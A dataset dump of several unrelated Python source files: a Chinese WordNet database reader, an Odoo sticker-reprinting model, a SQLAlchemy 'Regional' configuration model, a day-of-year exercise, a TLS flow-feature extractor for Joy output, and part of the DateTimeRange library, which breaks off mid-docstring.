{"seq_id":"42913248","text":"#! /usr/bin/env python\n# coding=utf-8\n\n\"\"\"\n\nRead the data in CWN.\n\nThe lexical entries are in Traditional Chinese. Since the dictionary is hand-compiled, it has high precision but relatively low recall.\n\nChanges to the original classes and functions:\n\n1. Following WordNet, split lemmas, senses and synsets into three classes.\n2. Keep the relation-lookup functions; add a function that fetches the list of synsets, because one lemma can correspond to several synsets.\n3. Broadly speaking, the relation between words (or lemmas) and synsets (or concepts) is n:n, and this shows up in CWN, WN and BN alike.\n   When pointing at an object, concept and word are two sides of one coin: they have equal standing.\n\n   This \"equal standing\" appears in the process of \"linking with other representations\".\n   \"Other representations\" means examples, glosses, topics, semantic tags and so on. Before genuine symbol understanding, the two kinds of representation are equivalent.\n\n   \"Symbol understanding\" here means that the grasp and application of words and concepts can be demonstrated, in a strict and universal norm. To illustrate the \"equivalence\":\n   - if I observe a tree, I can take the tree in through brain activation or a dictionary lookup, and then take my next action;\n   - if I observe the character for \"tree\", I can consult a dictionary, look for examples, or re-create it in imagination to take the character in, and then take my next action;\n   - while I cannot verify the payoff of my action, all four routes of action are viable and indistinguishable.\n   Only after a norm for verifying the payoff of a \"route\" is obtained do the routes gain different standing according to their payoffs.\n\n#. In the raw data cwn_id has no foreign key, so the database relations must be inferred from the code; results such as those of lookup_relations therefore still need verification.\n\n\"\"\"\n\nimport io\nimport sys\nimport pandas as pd\nfrom sqlite3 import connect\n\npd.set_option('display.width', 720)\n\nconn = connect(database='/home/shawn/Projects/x.resources/semantic/CWN/cwn_dirty.sqlite')\nc = conn.cursor()\n\n\nclass Lemmas:\n    def __init__(self, lemma_type):\n        self.lemma_type = lemma_type\n        self.lemmas = self.lookup_lemmas()\n        self.lemma_ids = self.lemmas['lemma_id']\n\n    def lookup_lemmas(self):\n        c.execute(u'select * from cwn_lemma where lemma_type=\"{}\"'.format(self.lemma_type))\n        _columns = [i[0] for i in c.description]\n        return pd.DataFrame(c.fetchall(), columns=_columns)\n\n    def lookup_relations(self, lemma_id):\n        res = {}\n        c.execute(u'select * from cwn_relation where cwn_id like \"%{}%\"'.format(lemma_id))\n        for cwn_relation in c.fetchall():\n            rel_type = cwn_relation[3]\n            rel_lemma = cwn_relation[4]\n            if rel_type not in res:\n                res[rel_type] = [rel_lemma]\n            else:\n                res[rel_type].append(rel_lemma)\n        return res\n\n\n# noinspection PyMethodMayBeStatic\nclass Senses:\n    def __init__(self, lemma_id):\n        self.lemma_id = lemma_id\n        self.senses = self.lookup_senses()\n        self.sense_ids = self.senses['sense_id']\n        self.synset_ids = self.senses['synset_id']\n\n    def lookup_senses(self):\n        c.execute(u'select * from cwn_sense where lemma_id=\"{}\"'.format(self.lemma_id))\n        _columns = [i[0] for i in c.description]\n        return pd.DataFrame(c.fetchall(), columns=_columns)\n\n    def lookup_examples(self, sense_id):\n        # return example contents of a sense_id.\n        c.execute(u'select * from cwn_example where cwn_id=\"{}\"'.format(sense_id))\n        _columns = [i[0] for i in c.description]\n        return pd.DataFrame(c.fetchall(), columns=_columns)\n\n\nclass Synset:\n    def __init__(self, synset_id):\n        self.synset_id = synset_id\n        self.synset = self.lookup_synset()\n\n    def lookup_synset(self):\n        # column member should be id in table of cwn_sense.\n        c.execute(u'select * from cwn_goodSynset where id = {}'.format(self.synset_id))\n        _columns = [i[0] for i in c.description]\n        return pd.Series(c.fetchone(), index=_columns)\n\n\nif __name__ == '__main__':\n\n    # format of pandas.to_html().\n    table_css = u'''\n    '''\n\n    token = unicode(sys.argv[1], 'utf8')\n    html_fld = sys.argv[2] if len(sys.argv) > 2 else '/home/shawn/Documents/temp/cwordnet/'\n    with io.open(u'{}Lemma_net_{}.html'.format(html_fld, token), 'w', encoding='utf8') as f:\n        f.write(table_css)\n    html = io.open(u'{}Lemma_net_{}.html'.format(html_fld, token), 'a', encoding='utf8')\n\n    a_lemmas = Lemmas(lemma_type=token)\n    html.write(u'\\n\\nLemma ids are:\\n\\n')\n    a_lemmas.lemmas.to_html(html)\n\n    for lemma_id in a_lemmas.lemma_ids:\n        html.write(u'\\n\\nLemma {} has following relations:\\n\\n'.format(lemma_id))\n        a_relations = a_lemmas.lookup_relations(lemma_id)\n        pd.DataFrame.from_records(a_relations.iteritems()).to_html(html)\n\n        html.write(u'\\n\\nLemma {} has following senses:\\n\\n'.format(lemma_id))\n        a_senses = Senses(lemma_id=lemma_id)\n        a_senses.senses.get(['sense_id', 'synset_id']).to_html(html)\n\n        for sense_id, synset_id in zip(a_senses.sense_ids, a_senses.synset_ids):\n            example = a_senses.lookup_examples(sense_id)\n            html.write(u'\\n\\nSense {} has following examples:\\n\\n'.format(sense_id))\n            example.to_html(html)\n\n            a_synset = Synset(synset_id=synset_id)\n            html.write(u'\\n\\nSynset {} includes attributes of:\\n\\n
'.format(synset_id))\n a_synset.synset.get(['gloss', 'member']).to_frame().to_html(html)\n\n html.close()\n","sub_path":"mimicry/lexicon/cwordnet.py","file_name":"cwordnet.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"243332696","text":"# -*- coding: utf-8 -*-\n# © 2017 Jérôme Guerriat\n# © 2017 Niboo SPRL (https://www.niboo.be/)\n# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).\n\nfrom odoo import api, fields, models\nimport urllib2\nimport json\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass PrintedStickers(models.Model):\n\n _name = 'printed.sticker'\n\n date_printed = fields.Datetime(String='Printed On')\n template_name = fields.Text(string='URL called')\n json_params = fields.Text(string='Parameters')\n mrp_production_id = fields.Many2one('mrp.production',\n string='Origin Production')\n stock_picking_id = fields.Many2one('stock.picking',\n string='Origin Picking')\n\n @api.multi\n def reprint_sticker(self):\n irconfig = self.env['ir.config_parameter']\n host = irconfig.get_param('bartender_host', default='')\n port = irconfig.get_param('bartender_port', default='')\n\n for sticker in self:\n url = 'http://%s:%s/Integration/%s/Execute' \\\n % (host, port, sticker.template_name)\n req = urllib2.Request(url)\n req.add_header('Content-Type', 'application/json')\n params = json.dumps(sticker.json_params)\n _logger.info(\"Printed with url %s and parameterss %s\" % (url,\n params))\n\n response = urllib2.urlopen(req, params)\n _logger.info(response)\n","sub_path":"sticker_management/models/printed_stickers.py","file_name":"printed_stickers.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"45097602","text":"\"\"\"\npyape.app.models.regional\n~~~~~~~~~~~~~~~~~~~\n\nRegional 表\n\"\"\"\nimport time\nimport toml\nfrom sqlalchemy.sql.expression import text\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom pyape.app import gdb, logger\nfrom pyape.app.queryfun import commit_and_response_error\nfrom pyape.config import RegionalConfig\nfrom pyape.util.func import parse_int\n\n\nclass Regional(gdb.Model):\n \"\"\" Regional 配置\n \"\"\"\n __tablename__ = 'regional'\n\n # 1000测试 2000审核 5000正式\n REGIONAL_TYPES = [1000, 2000, 5000]\n\n # Regional 配置的主键序号\n r = gdb.Column(gdb.SMALLINT, primary_key=True, index=True, autoincrement=False)\n\n # Regional 名称\n name = gdb.Column(gdb.VARCHAR(100), nullable=False)\n\n # Regional 的具体配置, TOML 字符串\n value = gdb.Column(gdb.TEXT, nullable=True)\n\n # 对 regional 的一种分类法,其值应为 typeid\n kindtype = gdb.Column(gdb.SMALLINT, nullable=False, index=True)\n\n # Regional 的状态,值为在 TypeID 中的整数,1正常,5 禁用\n status = gdb.Column(gdb.SMALLINT, nullable=False, default=1)\n\n # createtime = gdb.Column(gdb.TIMESTAMP(True), server_default=text('CURRENT_TIMESTAMP'))\n # updatetime = gdb.Column(gdb.TIMESTAMP(True), nullable=True,\n # server_default=text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'))\n\n # 改用时间戳,将格式化完全交给客户端来处理\n createtime = gdb.Column(gdb.INT, nullable=False)\n updatetime = gdb.Column(gdb.INT, nullable=True)\n\n @staticmethod\n def r2type(r):\n \"\"\" 将 r 转换成数字表示的 mjptype\n \"\"\"\n if r >= 1000 and r < 2000:\n return 1000\n elif r >= 2000 and r < 3000:\n return 2000\n elif r >= 5000:\n return 5000\n return None\n\n @classmethod\n def get_qry(cls, kindtype=None, rtype=None, status=None):\n \"\"\" 获取排序过的 Regional 项目,可以根据 
kindtype/rtype/status 筛选\n :param kindtype:\n :param rtype:\n :param status:\n :return:\n \"\"\"\n cause = []\n if kindtype is not None:\n cause.append(cls.kindtype == kindtype)\n if status is not None:\n cause.append(cls.status == status)\n if rtype is not None:\n if rtype == 1000:\n cause.append(cls.r.between(1000, 1999))\n elif rtype == 2000:\n cause.append(cls.r.between(2000, 2999))\n else:\n cause.append(cls.r.between(5000, 5999))\n return cls.query.filter(*cause).\\\n order_by(cls.status, cls.createtime.desc())\n\n def merge(self):\n \"\"\" 合并数据库中的其他字段到 value 配置中\n \"\"\"\n parsed_dict = {}\n if self.value is not None:\n parsed_dict = toml.loads(self.value)\n parsed_dict['name'] = self.name\n parsed_dict['r'] = self.r\n parsed_dict['kindtype'] = self.kindtype\n parsed_dict['status'] = self.status\n parsed_dict['createtime'] = self.createtime\n parsed_dict['updatetime'] = self.updatetime\n parsed_dict['rtype'] = Regional.r2type(self.r)\n return parsed_dict\n\n\ndef get_regional_config(status=None):\n \"\"\" 从数据库中读取 regional 的配置,转换成 RegionalConfig\n \"\"\"\n # 取出数据库中所有启用的 Regional\n qry = Regional.query\n if isinstance(status, int):\n qry = qry.filter_by(status=status)\n regional_list = [ritem.merge() for ritem in qry.all()]\n return RegionalConfig(regional_list)\n\n\ndef check_regional(r, ignore_zero=False):\n \"\"\" 检查 regional 是否有效,同时返回数据库中查询到的 regional 配置\n :param ignore_zero: 值为真,则允许 r 值为 0。0 是一个特殊的 r 值,代表全局 r\n :return: 已经转换成整数的 regional 值,以及数据库中查到的 regional 配置\n \"\"\"\n r = parse_int(r)\n if r is None:\n return None, None\n if ignore_zero:\n if r == 0:\n return 0, Regional.query.filter_by(status=1, r=0).first()\n # 从数据库中的启用的 regional 中查找\n regional = Regional.query.filter_by(status=1, r=r).first()\n if regional is None:\n return None, None\n return r, regional\n\n\ndef check_regionals(rs, ignore_zero=False):\n \"\"\" 判断数据库中是否包含所有的 rs\n :param ignore_zero: 值为真,则允许 rs 值为 [0]。0 是一个特殊的 r 值,代表全局 r\n \"\"\"\n lenrs = len(rs)\n if ignore_zero:\n # 传递 0 的时候, rs 只能拥有 1 个项: 0\n if lenrs == 1 and parse_int(rs[0]) == 0:\n return True\n regionals = Regional.query.filter_by(status=1).filter(Regional.r.in_(rs)).all()\n return len(regionals) == lenrs\n\n\ndef init_regional():\n \"\"\" 初始化 regional0 这是必须存在的一条\n \"\"\"\n r0 = Regional.query.get(0)\n if r0 is not None:\n raise TypeError('The regional 0 is exists!')\n\n now = int(time.time())\n r0 = Regional(r=0, name='0', kindtype=0, status=1, createtime=now, updatetime=now)\n resp = commit_and_response_error(r0, return_dict=True)\n if resp is not None:\n raise SQLAlchemyError('Init regional table error: %s' % resp['message'])\n","sub_path":"pyape/app/models/regional.py","file_name":"regional.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"530532485","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n输入某年某月某日,判断这一天是这一年的第几天?\n\"\"\"\n\n\nimport datetime\n\ndef judge_day(year, month, day):\n date1 = datetime.date(year=int(year), month=int(month), day=int(day))\n date2 = datetime.date(year=int(year), month=1, day=1) # 做差\n return (date1 - date2).days + 1\n\n\nif __name__ == \"__main__\":\n year = input(\"请输入年份:\")\n month = input(\"请输入月份:\")\n day = input(\"请输入天:\")\n string = '/'.join([year, month, day])\n print(\"%s 是 %s 的第 %d 天。\"%(string, year, judge_day(year, month, day)))","sub_path":"20_01_31 
Exercises/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"436762668","text":"import ujson as json\nimport sys\nimport gzip\nfrom collections import defaultdict\nimport argparse\nimport os\n#import matplotlib.pyplot as plt\nimport numpy as np\ndef getMetadata(flow): \n\ttmp = []\n\t# inbound packets\n\tif 'num_pkts_in' in flow:\n\t\ttmp.append(flow['num_pkts_in'])\n\telse:\n\t\ttmp.append(0)\n\t# outbound packets\n\tif 'num_pkts_out' in flow:\n\t\ttmp.append(flow['num_pkts_out']) \n\telse:\n\t\ttmp.append(0)\n\t# inbound bytes\n\tif 'bytes_in' in flow:\n\t\ttmp.append(flow['bytes_in']) \n\telse:\n\t\ttmp.append(0)\n\t# outbound bytes\n\tif 'bytes_out' in flow:\n\t\ttmp.append(flow['bytes_out']) \n\telse:\n\t\ttmp.append(0)\n\t# elapsed time of flow\n\tif flow['packets'] == []:\n\t\ttmp.append(0)\n\telse:\n\t\ttime = 0\n\t\tfor packet in flow['packets']:\n\t\t\ttime += packet['ipt']\n\t\ttmp.append(time)\n\treturn tmp\n\ndef getTimes(flow):\n\tnumRows = 10\n\tbinSize = 50.0\n\ttransMat = np.zeros((numRows,numRows))\n\tif len(flow['packets']) == 0:\n\t\treturn list(transMat.flatten())\n\telif len(flow['packets']) == 1:\n\t\tcur = min(int(flow['packets'][0]['ipt']/float(binSize)), numRows-1)\n\t\ttransMat[cur, cur] = 1\n\t\treturn list(transMat.flatten())\n\t# get raw transition counts\n\tfor i in range(1, len(flow['packets'])):\n\t\tprev = min(int(flow['packets'][i-1]['ipt']/float(binSize)), numRows-1)\n\t\tcur = min(int(flow['packets'][i]['ipt']/float(binSize)), numRows-1)\n\t\ttransMat[prev, cur] += 1\t\n\t# get empirical transition probabilities\n\tfor i in range(numRows):\n\t\tif float(np.sum(transMat[i:i+1])) != 0:\n\t\t\ttransMat[i:i+1] = transMat[i:i+1]/float(np.sum(transMat[i:i+1]))\n\treturn list(transMat.flatten())\n\ndef getLengths(flow):\n\tnumRows = 10\n\tbinSize = 150.0\n\ttransMat = np.zeros((numRows,numRows))\n\tif len(flow['packets']) == 0:\n\t\treturn list(transMat.flatten())\n\telif len(flow['packets']) == 1:\n\t\tcur = min(int(flow['packets'][0]['b']/float(binSize)), numRows-1)\n\t\ttransMat[cur, cur] = 1\n\t\treturn list(transMat.flatten())\n\t# get raw transition counts\n\tfor i in range(1, len(flow['packets'])):\n\t\tprev = min(int(flow['packets'][i-1]['b']/float(binSize)), numRows-1)\n\t\t#if 'b' not in flow['packets'][i]:\n\t\t#\tbreak\n\t\tcur = min(int(flow['packets'][i]['b']/float(binSize)), numRows-1)\n\t\ttransMat[prev, cur] += 1\n\t# get empirical transition probabilities\n\tfor i in range(numRows):\n\t\tif float(np.sum(transMat[i:i+1])) != 0:\n\t\t\ttransMat[i:i+1] = transMat[i:i+1]/float(np.sum(transMat[i:i+1]))\n\treturn list(transMat.flatten())\n\ndef getByteDist(flow):\n\tif len(flow['packets']) == 0:\n\t\treturn list(np.zeros(256))\n\tif 'byte_dist' in flow and sum(flow['byte_dist']) > 0:\n\t\ttmp = map(lambda x: x/float(sum(flow['byte_dist'])), flow['byte_dist'])\n\t\treturn list(tmp)\n\telse:\n\t\treturn list(np.zeros(256))\n\n\ndef ProcessMETA(inPathName, fileName, meta):\n\tjson_file = \"%s%s\" % (inPathName, fileName)\n\t#print(\"processing META for %s\" %(json_file)) #verbose\n\t#read each line and convert it into dict\n\tlineno = 0\n\ttotal = 0\n\twith gzip.open(json_file, 'r') as fp:\n\t\tfor line in fp:\n\t\t\tlineno = lineno + 1\n\t\t\ttry:\n\t\t\t\ttmp = json.loads(line)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\tif ('version' in tmp) or (\"tls\" not in tmp) or (int(tmp[\"dp\"]) != 443):\n\t\t\t\tcontinue\n\t\t\ttotal += 
1\n\t\t\tserverAddr = \"%s@%s@%s@%s\" % (str(lineno), tmp[\"sa\"], str(tmp[\"sp\"]), tmp[\"da\"])\n\t\t\t#print serverAddr\n\t\t\ttry:\n\t\t\t\tmeta[serverAddr]['count'] += 1\n\t\t\t#if serverAddr not in meta:\n\t\t\texcept KeyError:\t\t\t\t\n\t\t\t\tmeta[serverAddr] = defaultdict()\n\t\t\t\tmeta[serverAddr]['count'] = 1\n\t\t\t\t# Multithread to speed up Meta time?\n\t\t\t\t#1 times\n\t\t\t\tmeta[serverAddr]['flowTimes'] = getTimes(tmp)\n\t\t\t\t#2 lengths\n\t\t\t\tmeta[serverAddr]['flowLengths'] = getLengths(tmp)\n\t\t\t\t#3 byte distribution\n\t\t\t\tmeta[serverAddr]['flowByteDist'] = getByteDist(tmp)\n\t\t\t\t\n\ttry:\n\t\tmeta[\"totalMETA\"] += total\t\n\t#if \"totalMETA\" not in meta:\n\texcept KeyError:\t\t\n\t\tmeta[\"totalMETA\"] = total\n\t\t\n\n\ndef saveToJson(outPathName, fileName, meta):\n\tfname = \"%s%s_META.json\" % (outPathName, (fileName.split('.'))[0])\n\t#print(\"save JSON to \" + fname) #verbose\n\twith open(fname, 'w') as fp:\n\t\tjson.dump(meta, fp)\n\ndef main():\n\tparser = argparse.ArgumentParser(description=\"Probability Distribution of META Features in Dataset\", add_help=True)\n\tparser.add_argument('-i', '--input', action=\"store\", help=\"The input folder containing files generated by Joy\")\n\tparser.add_argument('-j', '--json', action=\"store_true\", default=False, help=\"Generate JSON output file\")\n\targs = parser.parse_args()\n\n\t#setup input folder and output folders\n\tif args.input == None or not os.path.isdir(args.input):\n\t\tprint(\"No valid input folder!\")\n\t\treturn\n\telse:\n\t\tjoyFolder = args.input\n\t\tif not joyFolder.endswith('/'):\n\t\t\tjoyFolder += '/'\n\tparentFolder = os.path.abspath(os.path.join(joyFolder, os.pardir))\n\tif not parentFolder.endswith('/'):\n\t\tparentFolder += '/'\n\tMETA_JSON_Folder = \"%sMETA_JSON/\" % (parentFolder)\n\tif not os.path.exists(META_JSON_Folder):\n\t\tos.mkdir(META_JSON_Folder)\n\n\tif args.json == True:\n\t\tfiles = os.listdir(joyFolder)\n\t\tfor item in files:\n\t\t\ttry:\n\t\t\t\tmeta = defaultdict()\n\t\t\t\tProcessMETA(joyFolder, item, meta) \n\t\t\t\tsaveToJson(META_JSON_Folder, item, meta)\n\t\t\texcept:\n\t\t\t\tcontinue\n\telse:\n\t\tprint(\"Nothing to do!\")\n\t\treturn\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"daalAnalyzeMETA.py","file_name":"daalAnalyzeMETA.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"449994282","text":"# encoding: utf-8\n\n\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi \n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nfrom .__version__ import __author__, __copyright__, __email__, __license__, __version__\nimport datetime\n\nimport dateutil.parser\nimport dateutil.relativedelta as rdelta\nimport typepy\n\n\nclass DateTimeRange(object):\n \"\"\"\n The class that represents the time range.\n\n :param datetime.datetime/str start: |param_start_datetime|\n :param datetime.datetime/str end: |param_end_datetime|\n\n :Examples:\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900\n\n .. py:attribute:: start_time_format\n\n Conversion format string for :py:attr:`.start_datetime`.\n\n .. seealso:: :py:meth:`.get_start_time_str`\n\n .. py:attribute:: end_time_format\n\n Conversion format string for :py:attr:`.end_datetime`.\n\n .. 
seealso:: :py:meth:`.get_end_time_str`\n \"\"\"\n\n NOT_A_TIME_STR = \"NaT\"\n\n def __init__(\n self,\n start_datetime=None,\n end_datetime=None,\n start_time_format=\"%Y-%m-%dT%H:%M:%S%z\",\n end_time_format=\"%Y-%m-%dT%H:%M:%S%z\",\n ):\n\n self.set_time_range(start_datetime, end_datetime)\n\n self.start_time_format = start_time_format\n self.end_time_format = end_time_format\n\n self.is_output_elapse = False\n self.separator = \" - \"\n\n def __repr__(self):\n text_list = [self.get_start_time_str(), self.get_end_time_str()]\n\n if self.is_output_elapse:\n suffix = \" ({})\".format(self.end_datetime - self.start_datetime)\n else:\n suffix = \"\"\n\n return self.separator.join(text_list) + suffix\n\n def __eq__(self, other):\n if not isinstance(other, DateTimeRange):\n return False\n\n return all(\n [self.start_datetime == other.start_datetime, self.end_datetime == other.end_datetime]\n )\n\n def __ne__(self, other):\n if not isinstance(other, DateTimeRange):\n return True\n\n return any(\n [self.start_datetime != other.start_datetime, self.end_datetime != other.end_datetime]\n )\n\n def __hash__(self):\n return (self.start_datetime, self.end_datetime).__hash__()\n\n def __add__(self, other):\n return DateTimeRange(self.start_datetime + other, self.end_datetime + other)\n\n def __iadd__(self, other):\n self.set_start_datetime(self.start_datetime + other)\n self.set_end_datetime(self.end_datetime + other)\n\n return self\n\n def __sub__(self, other):\n return DateTimeRange(self.start_datetime - other, self.end_datetime - other)\n\n def __isub__(self, other):\n self.set_start_datetime(self.start_datetime - other)\n self.set_end_datetime(self.end_datetime - other)\n\n return self\n\n def __contains__(self, x):\n \"\"\"\n :param x:\n |datetime|/``DateTimeRange`` instance to compare.\n Parse and convert to |datetime| if the value type is |str|.\n :type x: |datetime|/``DateTimeRange``/|str|\n :return: |True| if the ``x`` is within the time range\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(\"2015-03-22T10:05:00+0900\" in time_range)\n print(\"2015-03-22T10:15:00+0900\" in time_range)\n\n time_range_smaller = DateTimeRange(\"2015-03-22T10:03:00+0900\", \"2015-03-22T10:07:00+0900\")\n print(time_range_smaller in time_range)\n :Output:\n .. parsed-literal::\n\n True\n False\n True\n\n .. seealso::\n :py:meth:`.validate_time_inversion`\n \"\"\"\n\n self.validate_time_inversion()\n\n if isinstance(x, DateTimeRange):\n return x.start_datetime >= self.start_datetime and x.end_datetime <= self.end_datetime\n\n try:\n value = dateutil.parser.parse(x)\n except (TypeError, AttributeError):\n value = x\n\n return self.start_datetime <= value <= self.end_datetime\n\n @property\n def start_datetime(self):\n \"\"\"\n :return: Start time of the time range.\n :rtype: datetime.datetime\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.start_datetime\n :Output:\n .. parsed-literal::\n\n datetime.datetime(2015, 3, 22, 10, 0, tzinfo=tzoffset(None, 32400))\n \"\"\"\n\n return self.__start_datetime\n\n @property\n def end_datetime(self):\n \"\"\"\n :return: End time of the time range.\n :rtype: datetime.datetime\n\n :Sample Code:\n .. 
code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.end_datetime\n :Output:\n .. parsed-literal::\n\n datetime.datetime(2015, 3, 22, 10, 10, tzinfo=tzoffset(None, 32400))\n \"\"\"\n\n return self.__end_datetime\n\n @property\n def timedelta(self):\n \"\"\"\n :return:\n (|attr_end_datetime| - |attr_start_datetime|) as |timedelta|\n :rtype: datetime.timedelta\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.timedelta\n :Output:\n .. parsed-literal::\n\n datetime.timedelta(0, 600)\n \"\"\"\n\n return self.end_datetime - self.start_datetime\n\n def is_set(self):\n \"\"\"\n :return:\n |True| if both |attr_start_datetime| and\n |attr_end_datetime| were not |None|.\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n\n time_range = DateTimeRange()\n print(time_range.is_set())\n\n time_range.set_time_range(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.is_set())\n :Output:\n .. parsed-literal::\n\n False\n True\n \"\"\"\n\n return all([self.start_datetime is not None, self.end_datetime is not None])\n\n def validate_time_inversion(self):\n \"\"\"\n Check time inversion of the time range.\n\n :raises ValueError:\n If |attr_start_datetime| is\n bigger than |attr_end_datetime|.\n :raises TypeError:\n Any one of |attr_start_datetime| and |attr_end_datetime|,\n or both is inappropriate datetime value.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:10:00+0900\", \"2015-03-22T10:00:00+0900\")\n try:\n time_range.validate_time_inversion()\n except ValueError:\n print \"time inversion\"\n :Output:\n .. parsed-literal::\n\n time inversion\n \"\"\"\n\n if not self.is_set():\n # for python2/3 compatibility\n raise TypeError\n\n if self.start_datetime > self.end_datetime:\n raise ValueError(\n \"time inversion found: {:s} > {:s}\".format(\n str(self.start_datetime), str(self.end_datetime)\n )\n )\n\n def is_valid_timerange(self):\n \"\"\"\n :return:\n |True| if the time range is\n not null and not time inversion.\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range.is_valid_timerange())\n time_range.set_time_range(\"2015-03-22T10:20:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.is_valid_timerange())\n time_range.set_time_range(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.is_valid_timerange())\n :Output:\n .. parsed-literal::\n\n False\n False\n True\n\n .. seealso::\n :py:meth:`.is_set`\n :py:meth:`.validate_time_inversion`\n \"\"\"\n\n try:\n self.validate_time_inversion()\n except (TypeError, ValueError):\n return False\n\n return self.is_set()\n\n def is_intersection(self, x):\n \"\"\"\n :param DateTimeRange x: Value to compare\n :return: |True| if intersect with ``x``\n :rtype: bool\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n x = DateTimeRange(\"2015-03-22T10:05:00+0900\", \"2015-03-22T10:15:00+0900\")\n time_range.is_intersection(x)\n :Output:\n .. 
parsed-literal::\n\n True\n \"\"\"\n\n return self.intersection(x).is_set()\n\n def get_start_time_str(self):\n \"\"\"\n :return:\n |attr_start_datetime| as |str| formatted with\n |attr_start_time_format|.\n Return |NaT| if the invalid value or the invalid format.\n :rtype: str\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.get_start_time_str())\n time_range.start_time_format = \"%Y/%m/%d %H:%M:%S\"\n print(time_range.get_start_time_str())\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:00:00+0900\n 2015/03/22 10:00:00\n \"\"\"\n\n try:\n return self.start_datetime.strftime(self.start_time_format)\n except AttributeError:\n return self.NOT_A_TIME_STR\n\n def get_end_time_str(self):\n \"\"\"\n :return:\n |attr_end_datetime| as a |str| formatted with\n |attr_end_time_format|.\n Return |NaT| if invalid datetime or format.\n :rtype: str\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n print(time_range.get_end_time_str())\n time_range.end_time_format = \"%Y/%m/%d %H:%M:%S\"\n print(time_range.get_end_time_str())\n :Output:\n .. parsed-literal::\n\n 2015-03-22T10:10:00+0900\n 2015/03/22 10:10:00\n \"\"\"\n\n try:\n return self.end_datetime.strftime(self.end_time_format)\n except AttributeError:\n return self.NOT_A_TIME_STR\n\n def get_timedelta_second(self):\n \"\"\"\n :return: (|attr_end_datetime| - |attr_start_datetime|) as seconds\n :rtype: float\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange(\"2015-03-22T10:00:00+0900\", \"2015-03-22T10:10:00+0900\")\n time_range.get_timedelta_second()\n :Output:\n .. parsed-literal::\n\n 600.0\n \"\"\"\n\n return self.__get_timedelta_sec(self.timedelta)\n\n def set_start_datetime(self, value, timezone=None):\n \"\"\"\n Set the start time of the time range.\n\n :param value: |param_start_datetime|\n :type value: |datetime|/|str|\n :raises ValueError: If the value is invalid as a |datetime| value.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range)\n time_range.set_start_datetime(\"2015-03-22T10:00:00+0900\")\n print(time_range)\n :Output:\n .. parsed-literal::\n\n NaT - NaT\n 2015-03-22T10:00:00+0900 - NaT\n \"\"\"\n\n if value is None:\n self.__start_datetime = None\n return\n\n try:\n self.__start_datetime = typepy.type.DateTime(\n value, strict_level=typepy.StrictLevel.MIN, timezone=timezone\n ).convert()\n except typepy.TypeConversionError as e:\n raise ValueError(e)\n\n def set_end_datetime(self, value, timezone=None):\n \"\"\"\n Set the end time of the time range.\n\n :param datetime.datetime/str value: |param_end_datetime|\n :raises ValueError: If the value is invalid as a |datetime| value.\n\n :Sample Code:\n .. code:: python\n\n from datetimerange import DateTimeRange\n time_range = DateTimeRange()\n print(time_range)\n time_range.set_end_datetime(\"2015-03-22T10:10:00+0900\")\n print(time_range)\n :Output:\n .. 
